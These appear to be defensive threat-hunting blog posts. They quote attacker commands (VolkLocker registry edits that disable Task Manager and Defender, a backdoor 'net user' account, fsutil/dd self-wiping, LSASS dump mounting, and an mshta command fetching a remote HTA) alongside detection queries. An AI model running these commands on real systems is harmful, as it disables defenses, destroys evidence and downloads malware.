Know Your Adversary

Hello everyone! We talked about Modify Registry (T1112) a few times already, but I spotted a few more interesting procedures, so let's have a look. Our example for today is  VolkLocker . It has a few interesting behaviors related to registry modification. It disables Task Manager: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f Disables Registry Editor: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f Disables Windows Command Shell: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windo...

Hello everyone! Adversaries often use compromised credentials, but in some cases they can create new accounts. And in some cases they are quite unique, so we can use it for detection and hunting. As always, we need some examples. Let's look into this report . The adversary created new administrator accounts with the following names: backupadmin , admin_gpo and  lapsadmin1 . For example: cmd.exe /c net user backupadmin abcd1234 Suspicious user creation events may be great targets for hunting, so make sure you document it not only for attribution and clustering, but also for detection: event_type: "usercreatewin" AND usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1") See you tomorrow!

Hello everyone! In many cases adversaries remove artifacts from compromised systems, so today we'll look at a few examples of  Indicator Removal: File Deletion (T1070.004) . And our example for today -  01flip ransomware . It has both Windows and Linux variants. Windows variant removes itself using the following command: ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name} As you can see, it abuses fsutil to wipe the file. We can look for similar activity: event_type: "processcreatewin" AND proc_file_path: "fsutil.exe" AND cmdline: ("file" AND "setzerodata") Linux variant runs the following command: sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1 Here the adversary abuses dd , and it's another hunting oportunity: event_type: "processcreatenix" AND p...

Hello everyone! We talked about it a few times already, but I've spotted another forensic tool in adversary's arsenal today. And yes, it's another example of how threat actors can obtain an LSASS dump. This time, according to this post , they used  MemProcFS to mount a dump of compromised system's memory: memprocfs.exe -device dump.dmp If you are not doing incident response, for example, MemProcFS execution is a quite suspicious event, so it's worth a query: event_type: "processcreatewin" AND proc_file_originalfilename: "memprocfs.exe" See you tomorrow!

Hello everyone! Today we'll look at another example of how adversaries abuse legitimate Windows executables to evade defenses. This time it's  SystemSettingsAdminFlows.exe . According to this report , DeadLock leveraged this utility to disable various features of Windows Defender: SystemSettingsAdminFlows.exe Defender RTP 1  SystemSettingsAdminFlows.exe Defender SpynetReporting 0  SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0  SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1 The commands disable Real-Time Protection (RTP) and cloud-based protections, stops the machine from sending threat reports to Microsoft, and prevent Windows Defender from automatically submitting suspicious files for analysis. Worth a query, isn't it? event_type: "processcreatewin" AND proc_file_path: "systemsettingsadminflows.exe" AND cmdline: "defender" See you tomorrow!

Hello everyone! It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting -  System Binary Proxy Execution: Mshta (T1218.005) . I've spotted it again looking through the report on activity cluster we track as Lone Wolf . The adversary leveraged malicious LNK files to deploy Cobalt Strike beacon. The LNK, for example, runs the following command: powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'" As you can see, here mshta.exe is used to access a link, which redirects to a malicious HTA file. So, for example, we can search for mshta.exe accessing suspicious links: event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *http* See you tomorrow!